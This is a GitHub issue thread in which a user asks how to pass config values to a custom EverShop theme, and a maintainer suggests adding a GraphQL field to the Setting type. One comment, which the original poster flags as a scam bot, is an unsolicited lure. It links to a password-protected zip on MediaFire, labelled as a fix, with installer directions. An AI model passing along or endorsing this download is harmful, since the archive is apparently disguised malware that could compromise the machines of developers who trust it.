### ISSUE TITLE
[BUG] How to pass config variables to a custom theme

### ISSUE THREAD

**Issue by VanDavv** [evershopcommerce/evershop#605]
**Describe the bug**

How can I access config attributes inside a theme? I have some texts that I would like to inject based on config, but so far I was not able to find a reference on how could I pass it there (there are themeConfig mentions in the docs but nothing about the usage)

**To Reproduce**

I followed the docs and the best I could find (with modifications) is this import

```
import {getConfig} from '@evershop/evershop/src/lib/util/getConfig';
```

but it seems like a Node.js function rather than a browser method

**Expected behavior**

I expect there is a way to achieve this but the docs seems not to include this info

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by VanDavv** [comment]
What??

> Download https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file password: changeme In the installer menu, select "gcc."

@treoden  is this someone from your team / known contributors? WTF do we have scam bots on github now??

**Comment by treoden** [comment]
Hi @VanDavv 

The configure data are not mean for public. So if you have something publishable in the config and you want to able to use it on frontend code, create a graphql field to the `Setting` type and query it from your component.

Example: https://github.com/evershopcommerce/evershop/blob/main/packages/evershop/src/modules/tax/graphql/types/TaxSetting/TaxSetting.graphql
